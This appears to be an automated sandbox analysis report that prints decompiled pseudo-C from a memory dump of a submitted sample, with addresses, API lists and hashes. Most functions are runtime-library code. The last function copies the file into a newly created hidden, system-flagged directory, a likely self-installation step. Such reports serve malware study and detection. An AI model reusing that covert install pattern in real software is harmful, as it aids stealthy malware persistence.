										__eflags = _t360;
										if(__eflags != 0) {
											goto L79;
										} else {
										}
									}
								}
								goto L80;
							} else {
								__eflags =  *(_t446 + 2) - 0x43;
								if( *(_t446 + 2) != 0x43) {
									goto L59;
								} else {
									__eflags =  *((short*)(_t446 + 4)) - 0x5f;
									if( *((short*)(_t446 + 4)) != 0x5f) {
										goto L59;
									} else {
										while(1) {
											_t260 = E00B5BE10(_t446, 0xb34e1c);
											_t362 = _t260;
											_v472 = _t362;
											_pop(_t377);
											__eflags = _t362;
											if(_t362 == 0) {
												break;
											}
											_t262 = _t260 - _t446;
											__eflags = _t262;
											_v460 = _t262 >> 1;
											if(_t262 == 0) {
												break;
											} else {
												_t264 = 0x3b;
												__eflags =  *_t362 - _t264;
												if( *_t362 == _t264) {
													break;
												} else {
													_t433 = _v460;
													_t363 = 0xb34d64;
													_v456 = 1;
													do {
														_t265 = E00B563DD( *_t363, _t446, _t433);
														_t474 = _t474 + 0xc;
														__eflags = _t265;
														if(_t265 != 0) {
															goto L45;
														} else {
															_t378 =  *_t363;
															_t424 = _t378 + 2;
															do {
																_t333 =  *_t378;
																_t378 = _t378 + 2;
																__eflags = _t333 - _v468;
															} while (_t333 != _v468);
															_t377 = _t378 - _t424 >> 1;
															__eflags = _t433 - _t378 - _t424 >> 1;
															if(_t433 != _t378 - _t424 >> 1) {
																goto L45;
															}
														}
														break;
														L45:
														_v456 = _v456 + 1;
														_t363 = _t363 + 0xc;
														__eflags = _t363 - 0xb34d94;
													} while (_t363 <= 0xb34d94);
													_t360 = _v472 + 2;
													_t266 = E00B5BDB5(_t377, _t360, 0xb34e24);
													_t430 = _v464;
													_t449 = _t266;
													_pop(_t381);
													__eflags = _t449;
													if(_t449 != 0) {
														L48:
														__eflags = _v456 - 5;
														if(_v456 > 5) {
															_t382 = _v452;
															goto L54;
														} else {
															_push(_t449);
															_t269 = E00B598A4( &_v276, 0x83, _t360);
															_t477 = _t474 + 0x10;
															__eflags = _t269;
															if(_t269 != 0) {
																L82:
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																_push(0);
																E00B52919();
																asm("int3");
																_push(_t465);
																_t467 = _t477;
																_t272 =  *0xb69014; // 0x26ce9e99
																_v560 = _t272 ^ _t467;
																_push(_t360);
																_t365 = _v544;
																_push(_t449);
																_push(_t430);
																_t434 = _v548;
																_v1288 = _t365;
																_v1276 = E00B5830D(_t381, _t421) + 0x278;
																_t279 = E00B53E03(_t365, _t434, _v540, _v540,  &_v824, 0x83,  &_v1252, 0x55,  &_v1264);
																_t479 = _t477 - 0x2e4 + 0x18;
																__eflags = _t279;
																if(_t279 == 0) {
																	L122:
																	__eflags = 0;
																	goto L123;
																} else {
																	_t102 = _t365 + 2; // 0x6
																	_t453 = _t102 << 4;
																	__eflags = _t453;
																	_t282 =  &_v280;
																	_v724 = _t453;
																	_t385 =  *((intOrPtr*)(_t453 + _t434));
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t282 -  *_t385;
																		_t455 = _v724;
																		if( *_t282 !=  *_t385) {
																			break;
																		}
																		__eflags =  *_t282;
																		if( *_t282 == 0) {
																			L89:
																			_t283 = _v712;
																		} else {
																			_t461 =  *((intOrPtr*)(_t282 + 2));
																			__eflags = _t461 -  *((intOrPtr*)(_t385 + 2));
																			_v714 = _t461;
																			_t455 = _v724;
																			if(_t461 !=  *((intOrPtr*)(_t385 + 2))) {
																				break;
																			} else {
																				_t282 = _t282 + 4;
																				_t385 = _t385 + 4;
																				__eflags = _v714;
																				if(_v714 != 0) {
																					continue;
																				} else {
																					goto L89;
																				}
																			}
																		}
																		L91:
																		__eflags = _t283;
																		if(_t283 != 0) {
																			_t386 =  &_v280;
																			_t426 = _t386 + 2;
																			do {
																				_t284 =  *_t386;
																				_t386 = _t386 + 2;
																				__eflags = _t284 - _v712;
																			} while (_t284 != _v712);
																			_v728 = (_t386 - _t426 >> 1) + 1;
																			_t287 = E00B56F1C(4 + ((_t386 - _t426 >> 1) + 1) * 2);
																			_v740 = _t287;
																			__eflags = _t287;
																			if(_t287 == 0) {
																				goto L122;
																			} else {
																				_v736 =  *((intOrPtr*)(_t455 + _t434));
																				_v748 =  *(_t434 + 0xa0 + _t365 * 4);
																				_v752 =  *(_t434 + 8);
																				_v716 = _t287 + 4;
																				_t289 = E00B5604D(_t287 + 4, _v728,  &_v280);
																				_t481 = _t479 + 0xc;
																				__eflags = _t289;
																				if(_t289 != 0) {
																					_t290 = _v712;
																					_push(_t290);
																					_push(_t290);
																					_push(_t290);
																					_push(_t290);
																					_push(_t290);
																					E00B52919();
																					asm("int3");
																					_t292 =  *0xb6a53c; // 0x0
																					return _t292;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t455 + _t434)) = _v716;
																					if(_v280 != 0x43) {
																						L100:
																						_t295 = E00B53B10(_t365, _t434,  &_v708);
																						_t395 = _v712;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L100;
																						} else {
																							_t395 = _v712;
																							_t295 = _t395;
																						}
																					}
																					 *(_t434 + 0xa0 + _t365 * 4) = _t295;
																					__eflags = _t365 - 2;
																					if(_t365 != 2) {
																						__eflags = _t365 - 1;
																						if(_t365 != 1) {
																							__eflags = _t365 - 5;
																							if(_t365 == 5) {
																								 *((intOrPtr*)(_t434 + 0x14)) = _v720;
																							}
																						} else {
																							 *((intOrPtr*)(_t434 + 0x10)) = _v720;
																						}
																					} else {
																						_t459 = _v732;
																						_t427 = _t395;
																						_t405 = _t459;
																						 *(_t434 + 8) = _v720;
																						_v716 = _t459;
																						_v728 = _t459[8];
																						_v720 = _t459[9];
																						while(1) {
																							__eflags =  *(_t434 + 8) -  *_t405;
																							if( *(_t434 + 8) ==  *_t405) {
																								break;
																							}
																							_t460 = _v716;
																							_t427 = _t427 + 1;
																							_t327 =  *_t405;
																							 *_t460 = _v728;
																							_v720 = _t405[1];
																							_t405 = _t460 + 8;
																							 *((intOrPtr*)(_t460 + 4)) = _v720;
																							_t365 = _v744;
																							_t459 = _v732;
																							_v728 = _t327;
																							_v716 = _t405;
																							__eflags = _t427 - 5;
																							if(_t427 < 5) {
																								continue;
																							} else {
																							}
																							L108:
																							__eflags = _t427 - 5;
																							if(__eflags == 0) {
																								_t318 = E00B5BFC9(_t365, _t434, _t459, __eflags, _v712, 1, 0xb34cd8, 0x7f,  &_v536,  *(_t434 + 8), 1);
																								_t481 = _t481 + 0x1c;
																								__eflags = _t318;
																								if(_t318 == 0) {
																									_t406 = _v712;
																								} else {
																									_t320 = _v712;
																									do {
																										 *(_t467 + _t320 * 2 - 0x20c) =  *(_t467 + _t320 * 2 - 0x20c) & 0x000001ff;
																										_t320 = _t320 + 1;
																										__eflags = _t320 - 0x7f;
																									} while (_t320 < 0x7f);
																									_t322 = L00B4E36D( &_v536,  *0xb690a0, 0xfe);
																									_t481 = _t481 + 0xc;
																									__eflags = _t322;
																									_t406 = 0 | _t322 == 0x00000000;
																								}
																								_t459[1] = _t406;
																								 *_t459 =  *(_t434 + 8);
																							}
																							 *(_t434 + 0x18) = _t459[1];
																							goto L120;
																						}
																						__eflags = _t427;
																						if(_t427 != 0) {
																							 *_t459 =  *(_t459 + _t427 * 8);
																							_t459[1] =  *(_t459 + 4 + _t427 * 8);
																							 *(_t459 + _t427 * 8) = _v728;
																							 *(_t459 + 4 + _t427 * 8) = _v720;
																						}
																						goto L108;
																					}
																					L120:
																					_t296 = _t365 * 0xc;
																					_t198 = _t296 + 0xb34d60; // 0xb469c7
																					 *0xb672b4(_t434);
																					_t298 =  *((intOrPtr*)( *_t198))();
																					_t398 = _v736;
																					__eflags = _t298;
																					if(_t298 == 0) {
																						__eflags = _t398 - 0xb693d8;
																						if(_t398 != 0xb693d8) {
																							_t458 = _t365 + _t365;
																							__eflags = _t458;
																							asm("lock xadd [eax], ecx");
																							if(_t458 != 0) {
																								goto L127;
																							} else {
																								E00B564B8( *((intOrPtr*)(_t434 + 0x28 + _t458 * 8)));
																								E00B564B8( *((intOrPtr*)(_t434 + 0x24 + _t458 * 8)));
																								E00B564B8( *(_t434 + 0xa0 + _t365 * 4));
																								_t401 = _v712;
																								 *(_v724 + _t434) = _t401;
																								 *(_t434 + 0xa0 + _t365 * 4) = _t401;
																							}
																						}
																						_t399 = _v740;
																						 *_t399 = 1;
																						 *((intOrPtr*)(_t434 + 0x28 + (_t365 + _t365) * 8)) = _t399;
																					} else {
																						 *((intOrPtr*)(_v724 + _t434)) = _t398;
																						E00B564B8( *(_t434 + 0xa0 + _t365 * 4));
																						 *(_t434 + 0xa0 + _t365 * 4) = _v748;
																						E00B564B8(_v740);
																						 *(_t434 + 8) = _v752;
																						goto L122;
																					}
																					goto L123;
																				}
																			}
																		} else {
																			L123:
																			__eflags = _v16 ^ _t467;
																			return E00B4AE43(_v16 ^ _t467);
																		}
																		goto L131;
																	}
																	asm("sbb eax, eax");
																	_t283 = _t282 | 0x00000001;
																	__eflags = _t283;
																	goto L91;
																}
															} else {
																_t329 = _t449 + _t449;
																__eflags = _t329 - 0x106;
																if(_t329 >= 0x106) {
																	E00B4AF7A();
																	goto L82;
																} else {
																	 *((short*)(_t465 + _t329 - 0x10c)) = 0;
																	_t331 =  &_v276;
																	_push(_t331);
																	_push(_v456);
																	_push(_t430);
																	L83();
																	_t382 = _v452;
																	_t474 = _t477 + 0xc;
																	__eflags = _t331;
																	if(_t331 != 0) {
																		_t382 = _t382 + 1;
																		_v452 = _t382;
																	}
																	L54:
																	_t446 = _t360 + _t449 * 2;
																	_t267 =  *_t446 & 0x0000ffff;
																	_t421 = _t267;
																	__eflags = _t267;
																	if(_t267 != 0) {
																		_t446 = _t446 + 2;
																		__eflags = _t446;
																		_t421 =  *_t446 & 0x0000ffff;
																	}
																	__eflags = _t421;
																	if(_t421 != 0) {
																		continue;
																	} else {
																		__eflags = _t382;
																		if(__eflags != 0) {
																			goto L79;
																		} else {
																			break;
																		}
																		goto L80;
																	}
																}
															}
														}
													} else {
														_t332 = 0x3b;
														__eflags =  *_t360 - _t332;
														if( *_t360 != _t332) {
															break;
														} else {
															goto L48;
														}
													}
												}
											}
											goto L131;
										}
										goto L80;
									}
								}
							}
						}
					} else {
						__eflags = _t446;
						if(_t446 != 0) {
							_push(_t446);
							_push(_t248);
							_push(_t430);
							L83();
						}
						L80:
						__eflags = _v12 ^ _t465;
						return E00B4AE43(_v12 ^ _t465);
					}
				}
				L131:
			}

0x00b542a7
0x00b542aa
0x00b542ac
0x00b542af
0x00b542b0
0x00b542b9
0x00b542c1
0x00b542c3
0x00b542c8
0x00b543e5
0x00b543ea
0x00b542ce
0x00b542ce
0x00b542cf
0x00b542cf
0x00b542d2
0x00b542d5
0x00b542d7
0x00b542da
0x00b542dd
0x00b542df
0x00b542e2
0x00b542e7
0x00b542f5
0x00b542ff
0x00b54302
0x00b54305
0x00b54305
0x00b54310
0x00b54315
0x00b5431a
0x00000000
0x00b54320
0x00b54323
0x00b54323
0x00b54326
0x00b54328
0x00b5432b
0x00b5432d
0x00b5432d
0x00b5432d
0x00b54330
0x00b54330
0x00b54330
0x00b54336
0x00000000
0x00000000
0x00b5433b
0x00b54352
0x00b54352
0x00b5433d
0x00b5433d
0x00b54345
0x00000000
0x00b54347
0x00b54347
0x00b5434a
0x00b54350
0x00000000
0x00000000
0x00000000
0x00000000
0x00b54350
0x00b54345
0x00b5435b
0x00b5435b
0x00b54360
0x00b54365
0x00b54369
0x00b54375
0x00b54378
0x00b5437b
0x00b54385
0x00b5438d
0x00b54395
0x00000000
0x00b5439b
0x00b5439f
0x00b543ec
0x00b543f5
0x00b543f8
0x00b543fa
0x00b543fe
0x00b54402
0x00b54407
0x00b5440c
0x00b54402
0x00b54410
0x00b54412
0x00b54414
0x00b54418
0x00b54419
0x00b5441e
0x00b54423
0x00b54419
0x00b54426
0x00b54429
0x00b5442c
0x00b5442f
0x00b54432
0x00b543a1
0x00b543a4
0x00b543a7
0x00b543a9
0x00b543ad
0x00b543b1
0x00b543b6
0x00b543bb
0x00b543b1
0x00b543c1
0x00b543c3
0x00b543c8
0x00b543cd
0x00b543d2
0x00b543c8
0x00b543d3
0x00b543d7
0x00b543d7
0x00b543da
0x00b543de
0x00b543e1
0x00b543e1
0x00000000
0x00b543e4
0x00000000
0x00b54395
0x00b54356
0x00b54358
0x00b54358
0x00000000
0x00b54358
0x00b54439
0x00b5443a
0x00b5443b
0x00b5443c
0x00b5443d
0x00b5443e
0x00b54443
0x00b54446
0x00b54447
0x00b54449
0x00b5444f
0x00b54456
0x00b54459
0x00b5445c
0x00b5445d
0x00b5445e
0x00b54461
0x00b54462
0x00b54465
0x00b5446b
0x00b5446d
0x00b54492
0x00b5449c
0x00b544a2
0x00b544a4
0x00b544aa
0x00b544ac
0x00b54706
0x00b54707
0x00000000
0x00b544b2
0x00b544b2
0x00b544b6
0x00b54624
0x00b5463b
0x00b54640
0x00b54643
0x00b54645
0x00b5464b
0x00b5464d
0x00b54650
0x00b54652
0x00b54658
0x00b54658
0x00b5465a
0x00b546e1
0x00b546e1
0x00b54660
0x00b54660
0x00b54662
0x00b54668
0x00b5466b
0x00b5466e
0x00b54674
0x00000000
0x00000000
0x00b54676
0x00b5467a
0x00b546a3
0x00b546a5
0x00b5467c
0x00b5467c
0x00b54680
0x00b54684
0x00b5468b
0x00b54691
0x00000000
0x00b54693
0x00b54693
0x00b54696
0x00b54699
0x00b546a1
0x00000000
0x00000000
0x00000000
0x00000000
0x00b546a1
0x00b54691
0x00b546b0
0x00b546b0
0x00b546b2
0x00b546e0
0x00b546e0
0x00000000
0x00b546b4
0x00b546b4
0x00b546ba
0x00b546bb
0x00b546bc
0x00b546bd
0x00b546c2
0x00b546c8
0x00b546cb
0x00b546cd
0x00b546d6
0x00b546d8
0x00b546cf
0x00b546cf
0x00000000
0x00b546d0
0x00b546cd
0x00000000
0x00b546b2
0x00b546a9
0x00b546ab
0x00b546ae
0x00000000
0x00b546ae
0x00b546e7
0x00b546e7
0x00b546e8
0x00b546eb
0x00b546f1
0x00b546f1
0x00b546fa
0x00b546fc
0x00000000
0x00b546fe
0x00b546fe
0x00b54700
0x00000000
0x00b54702
0x00b54702
0x00b54700
0x00b546fc
0x00000000
0x00b544bc
0x00b544bc
0x00b544c1
0x00000000
0x00b544c7
0x00b544c7
0x00b544cc
0x00000000
0x00b544d2
0x00b544d2
0x00b544d8
0x00b544dd
0x00b544df
0x00b544e6
0x00b544e7
0x00b544e9
0x00000000
0x00000000
0x00b544ef
0x00b544ef
0x00b544f3
0x00b544f9
0x00000000
0x00b544ff
0x00b54501
0x00b54502
0x00b54505
0x00000000
0x00b5450b
0x00b5450b
0x00b54511
0x00b54516
0x00b54520
0x00b54524
0x00b54529
0x00b5452c
0x00b5452e
0x00000000
0x00b54530
0x00b54530
0x00b54532
0x00b54535
0x00b54535
0x00b54538
0x00b5453b
0x00b5453b
0x00b54546
0x00b54548
0x00b5454a
0x00000000
0x00000000
0x00b5454a
0x00000000
0x00b5454c
0x00b5454c
0x00b54552
0x00b54555
0x00b54555
0x00b54563
0x00b5456c
0x00b54571
0x00b54577
0x00b5457a
0x00b5457b
0x00b5457d
0x00b5458b
0x00b5458b
0x00b54592
0x00b545f3
0x00000000
0x00b54594
0x00b54594
0x00b545a2
0x00b545a7
0x00b545aa
0x00b545ac
0x00b54723
0x00b54725
0x00b54726
0x00b54727
0x00b54728
0x00b54729
0x00b5472a
0x00b5472f
0x00b54732
0x00b54733
0x00b5473b
0x00b54742
0x00b54745
0x00b54746
0x00b54749
0x00b5474d
0x00b5474e
0x00b54751
0x00b54761
0x00b54784
0x00b54789
0x00b5478c
0x00b5478e
0x00b54a66
0x00b54a66
0x00000000
0x00b54794
0x00b54794
0x00b54797
0x00b54797
0x00b5479a
0x00b547a0
0x00b547a9
0x00b547ab
0x00b547ae
0x00b547b5
0x00b547b8
0x00b547be
0x00000000
0x00000000
0x00b547c0
0x00b547c4
0x00b547ed
0x00b547ed
0x00b547c6
0x00b547c6
0x00b547ca
0x00b547ce
0x00b547d5
0x00b547db
0x00000000
0x00b547dd
0x00b547dd
0x00b547e0
0x00b547e3
0x00b547eb
0x00000000
0x00000000
0x00000000
0x00000000
0x00b547eb
0x00b547db
0x00b547fa
0x00b547fa
0x00b547fc
0x00b54805
0x00b5480b
0x00b5480e
0x00b5480e
0x00b54811
0x00b54814
0x00b54814
0x00b54824
0x00b54832
0x00b54837
0x00b5483e
0x00b54840
0x00000000
0x00b54846
0x00b5484c
0x00b54859
0x00b54862
0x00b54875
0x00b5487c
0x00b54881
0x00b54884
0x00b54886
0x00b54ae8
0x00b54aee
0x00b54aef
0x00b54af0
0x00b54af1
0x00b54af2
0x00b54af3
0x00b54af8
0x00b54af9
0x00b54aff
0x00b5488c
0x00b5488c
0x00b5489a
0x00b5489d
0x00b548b3
0x00b548ba
0x00b548c0
0x00b5489f
0x00b5489f
0x00b548a7
0x00000000
0x00b548a9
0x00b548a9
0x00b548af
0x00b548af
0x00b548a7
0x00b548c6
0x00b548cd
0x00b548d0
0x00b549f0
0x00b549f3
0x00b54a00
0x00b54a03
0x00b54a0b
0x00b54a0b
0x00b549f5
0x00b549fb
0x00b549fb
0x00b548d6
0x00b548d6
0x00b548dc
0x00b548e4
0x00b548e6
0x00b548e9
0x00b548f2
0x00b548fb
0x00b54901
0x00b54904
0x00b54906
0x00000000
0x00000000
0x00b54908
0x00b5490e
0x00b5490f
0x00b5491a
0x00b54922
0x00b5492a
0x00b5492d
0x00b54930
0x00b54936
0x00b5493c
0x00b54942
0x00b54948
0x00b5494b
0x00000000
0x00000000
0x00b5494d
0x00b54972
0x00b54972
0x00b54975
0x00b54992
0x00b54997
0x00b5499a
0x00b5499c
0x00b549da
0x00b5499e
0x00b5499e
0x00b549a4
0x00b549a9
0x00b549b1
0x00b549b2
0x00b549b2
0x00b549c9
0x00b549d0
0x00b549d3
0x00b549d5
0x00b549d5
0x00b549e0
0x00b549e6
0x00b549e6
0x00b549eb
0x00000000
0x00b549eb
0x00b5494f
0x00b54951
0x00b54956
0x00b5495c
0x00b54965
0x00b5496e
0x00b5496e
0x00000000
0x00b54951
0x00b54a0e
0x00b54a0e
0x00b54a12
0x00b54a1a
0x00b54a20
0x00b54a23
0x00b54a29
0x00b54a2b
0x00b54a79
0x00b54a7f
0x00b54a86
0x00b54a86
0x00b54a8c
0x00b54a90
0x00000000
0x00b54a92
0x00b54a96
0x00b54a9f
0x00b54aab
0x00b54ab9
0x00b54abf
0x00b54ac2
0x00b54ac2
0x00b54a90
0x00b54ad1
0x00b54ad9
0x00b54ae2
0x00b54a2d
0x00b54a33
0x00b54a3d
0x00b54a4f
0x00b54a56
0x00b54a63
0x00000000
0x00b54a63
0x00000000
0x00b54a2b
0x00b54886
0x00b547fe
0x00b54a68
0x00b54a6d
0x00b54a78
0x00b54a78
0x00000000
0x00b547fc
0x00b547f5
0x00b547f7
0x00b547f7
0x00000000
0x00b547f7
0x00b545b2
0x00b545b2
0x00b545b5
0x00b545ba
0x00b5471e
0x00000000
0x00b545c0
0x00b545c2
0x00b545ca
0x00b545d0
0x00b545d1
0x00b545d7
0x00b545d8
0x00b545dd
0x00b545e3
0x00b545e6
0x00b545e8
0x00b545ea
0x00b545eb
0x00b545eb
0x00b545f9
0x00b545f9
0x00b545fc
0x00b545ff
0x00b54601
0x00b54604
0x00b54606
0x00b54606
0x00b54609
0x00b54609
0x00b5460c
0x00b5460f
0x00000000
0x00b54615
0x00b54615
0x00b54617
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00b54617
0x00b5460f
0x00b545ba
0x00b545ac
0x00b5457f
0x00b54581
0x00b54582
0x00b54585
0x00000000
0x00000000
0x00000000
0x00000000
0x00b54585
0x00b5457d
0x00b54505
0x00000000
0x00b544f9
0x00000000
0x00b5461d
0x00b544cc
0x00b544c1
0x00b544b6
0x00b5446f
0x00b5446f
0x00b54471
0x00b54473
0x00b54474
0x00b54475
0x00b54476
0x00b5447b
0x00b5470d
0x00b54712
0x00b5471d
0x00b5471d
0x00b5446d
0x00000000

APIs

Part of subcall function 00B56F1C: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,?,00B5084B,00000002,?,?,?,00B424A9,00000000,0000002C,00B425BB), ref: 00B56F4E

_free.LIBCMT ref: 00B543B6
_free.LIBCMT ref: 00B543CD
_free.LIBCMT ref: 00B543EC
_free.LIBCMT ref: 00B54407
_free.LIBCMT ref: 00B5441E

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: 781f131ad3b4bf07e9f2ad0c5be0cca5effdd1ddf4df1a61f72e8d4076d8c111
Instruction ID: 265088c333de908b61d4fc7b0f684e742498c32e536c4c4532f22811a8176b52
Opcode Fuzzy Hash: 781f131ad3b4bf07e9f2ad0c5be0cca5effdd1ddf4df1a61f72e8d4076d8c111
Instruction Fuzzy Hash: 4A51C032A00604AFDB21DF29D881B6A77F4EF4872AF5445E9ED09DB260E731AE448B44

Uniqueness

Uniqueness Score: -1.00%

Function 00B54C65, Relevance: 7.6, APIs: 5, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00B54C65(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t27;
				signed int _t29;
				intOrPtr _t33;
				signed int _t38;
				signed int _t41;
				void* _t46;
				signed int _t50;
				intOrPtr* _t51;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t65;
				signed int _t67;
				signed int _t68;
				signed int _t69;
				signed int* _t70;
				signed int _t74;
				void* _t75;

				_t63 = __edx;
				_v12 = __ecx;
				_t27 =  *__ecx;
				_t70 =  *_t27;
				if(_t70 == 0) {
					L14:
					return _t27 | 0xffffffff;
				}
				_t29 =  *0xb69014; // 0x26ce9e99
				_t50 =  *_t70 ^ _t29;
				_t67 = _t70[1] ^ _t29;
				_t72 = _t70[2] ^ _t29;
				asm("ror edi, cl");
				asm("ror esi, cl");
				asm("ror ebx, cl");
				if(_t67 != _t72) {
					L13:
					 *_t67 = E00B52CB4( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
					_t33 = E00B4B0BF(_t50);
					_t51 = _v12;
					 *((intOrPtr*)( *((intOrPtr*)( *_t51)))) = _t33;
					_t23 = _t67 + 4; // 0x4
					 *((intOrPtr*)( *((intOrPtr*)( *_t51)) + 4)) = E00B4B0BF(_t23);
					 *((intOrPtr*)( *((intOrPtr*)( *_t51)) + 8)) = E00B4B0BF(_t72);
					return 0;
				}
				_t38 = 0x200;
				_t74 = _t72 - _t50 >> 2;
				if(_t74 <= 0x200) {
					_t38 = _t74;
				}
				_t68 = _t38 + _t74;
				if(_t68 == 0) {
					_t68 = 0x20;
				}
				if(_t68 < _t74) {
					L8:
					_t68 = _t74 + 4;
					_v8 = E00B5DE67(_t50, _t68, 4);
					_t27 = E00B564B8(0);
					_t61 = _v8;
					_t75 = _t75 + 0x10;
					if(_t61 == 0) {
						goto L14;
					}
					goto L9;
				} else {
					_v8 = E00B5DE67(_t50, _t68, 4);
					E00B564B8(0);
					_t61 = _v8;
					_t75 = _t75 + 0x10;
					if(_t61 != 0) {
						L9:
						_t50 = _t61;
						_v8 = _t61 + _t74 * 4;
						_t72 = _t61 + _t68 * 4;
						_t41 =  *0xb69014; // 0x26ce9e99
						_t67 = _v8;
						_t62 = _t67;
						_v16 = _t41;
						asm("sbb edx, edx");
						_t65 =  !_t63 & _t61 + _t68 * 0x00000004 - _t67 + 0x00000003 >> 0x00000002;
						if(_t65 == 0) {
							goto L13;
						}
						_t69 = _v16;
						_t46 = 0;
						do {
							_t46 = _t46 + 1;
							 *_t62 = _t69;
							_t62 = _t62 + 4;
						} while (_t46 != _t65);
						_t67 = _v8;
						goto L13;
					}
					goto L8;
				}
			}

0x00b54c65
0x00b54c6f
0x00b54c74
0x00b54c77
0x00b54c7b
0x00b54d86
0x00000000
0x00b54d86
0x00b54c81
0x00b54c90
0x00b54c95
0x00b54c97
0x00b54c99
0x00b54c9b
0x00b54c9d
0x00b54ca1
0x00b54d44
0x00b54d52
0x00b54d54
0x00b54d59
0x00b54d60
0x00b54d62
0x00b54d70
0x00b54d7f
0x00000000
0x00b54d82
0x00b54ca9
0x00b54cae
0x00b54cb3
0x00b54cb5
0x00b54cb5
0x00b54cb7
0x00b54cbc
0x00b54cc0
0x00b54cc0
0x00b54cc3
0x00b54ce2
0x00b54ce4
0x00b54cf0
0x00b54cf3
0x00b54cf8
0x00b54cfb
0x00b54d00
0x00000000
0x00000000
0x00000000
0x00b54cc5
0x00b54cd0
0x00b54cd3
0x00b54cd8
0x00b54cdb
0x00b54ce0
0x00b54d06
0x00b54d09
0x00b54d0b
0x00b54d0e
0x00b54d11
0x00b54d16
0x00b54d19
0x00b54d1b
0x00b54d2a
0x00b54d2e
0x00b54d30
0x00000000
0x00000000
0x00b54d32
0x00b54d35
0x00b54d37
0x00b54d37
0x00b54d38
0x00b54d3a
0x00b54d3d
0x00b54d41
0x00000000
0x00b54d41
0x00000000
0x00b54ce0

APIs

_free.LIBCMT ref: 00B54CD3
_free.LIBCMT ref: 00B54CF3
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00B54D54
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00B54D66
__crt_fast_encode_pointer.LIBVCRUNTIME ref: 00B54D73

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: __crt_fast_encode_pointer$_free
String ID:
API String ID: 366466260-0
Opcode ID: fdbf1eaf475bf69e59aaf8785ebcc7f911b6d8b465f6581e68a2422515074563
Instruction ID: 74e9350d4bbf3f79009aa4371e74652719a5b4a0c16c9e7ff2026a2e63ea1ee9
Opcode Fuzzy Hash: fdbf1eaf475bf69e59aaf8785ebcc7f911b6d8b465f6581e68a2422515074563
Instruction Fuzzy Hash: 4D41C536A002049FCB20DF68C881B6EB3F6EF89715B5545E8EA15EB391DB31ED45CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00B491F4, Relevance: 7.6, APIs: 5, Instructions: 91
fileCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E00B491F4(CHAR* __ecx, void* __eflags) {
				char _v8;
				CHAR* _v12;
				CHAR* _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t11;
				CHAR* _t13;
				intOrPtr* _t15;
				void* _t17;
				void* _t19;
				int _t23;
				void* _t29;
				void* _t33;
				char _t36;
				char _t38;
				void* _t41;
				void* _t43;
				void* _t44;
				CHAR* _t46;
				void* _t47;
				CHAR* _t48;
				void* _t49;
				void* _t53;

				_t53 = __eflags;
				_v16 = __ecx;
				_push(0x104);
				_t11 = E00B509A2();
				_push(0x104);
				_v8 = _t11;
				_v12 = E00B509A2();
				_t13 = E00B4903F(0x104,  &_v8,  &_v12, _t44, _t47, _t49, _t53);
				_push(0x104);
				_t48 = _t13;
				_t33 = E00B509A2();
				_t15 = E00B4A582(_t53);
				_t41 = _t33 - _t15;
				do {
					_t36 =  *_t15;
					 *((char*)(_t41 + _t15)) = _t36;
					_t15 = _t15 + 1;
					_t55 = _t36;
				} while (_t36 != 0);
				_push(_t33);
				_push(_v8);
				_push(_t48);
				_t45 = E00B4301E(_t55);
				_t17 = E00B42D46(_t33, _t16, _t48);
				_t56 = _t17;
				if(_t17 != 0) {
					L9:
					__eflags = 0;
					return 0;
				}
				_t19 = E00B4A9CD(_t56, _t45);
				E00B42FDB(_t56, E00B42ECE(_t33, _t45, _t48, _t56), _t19);
				if(PathFileExistsA(_t48) == 1) {
					goto L9;
				}
				_t46 = _v12;
				_t23 = PathFileExistsA(_t46);
				_t58 = _t23 - 1;
				if(_t23 != 1) {
					CreateDirectoryA(_t46, 0);
					SetFileAttributesA(_t46, 6);
				}
				CopyFileA(_v16, _t48, 0);
				_push(_t48);
				E00B48BA1(_t33, _t46, _t48);
				E00B499C5(_t33, _t46, _t48, _t58, _t48, _t33);
				E00B49B90(_t33, _t48, _t48, _t33);
				E00B49CBF(_t33, _t46, _t48, _t58, _t46);
				_push(0x104);
				_t29 = E00B509A2();
				_t43 = _t29 - _t48;
				do {
					_t38 =  *_t48;
					 *((char*)(_t43 + _t48)) = _t38;
					_t48 =  &(_t48[1]);
				} while (_t38 != 0);
				return _t29;
			}

0x00b491f4
0x00b49202
0x00b49205
0x00b49206
0x00b4920b
0x00b4920c
0x00b49217
0x00b4921d
0x00b49222
0x00b49223
0x00b4922d
0x00b4922f
0x00b49236
0x00b49238
0x00b49238
0x00b4923a
0x00b4923d
0x00b4923e
0x00b4923e
0x00b49245
0x00b49246
0x00b49249
0x00b4924f
0x00b49251
0x00b49256
0x00b49258
0x00b492de
0x00b492de
0x00000000
0x00b492de
0x00b4925f
0x00b4926b
0x00b4927a
0x00000000
0x00000000
0x00b4927c
0x00b49280
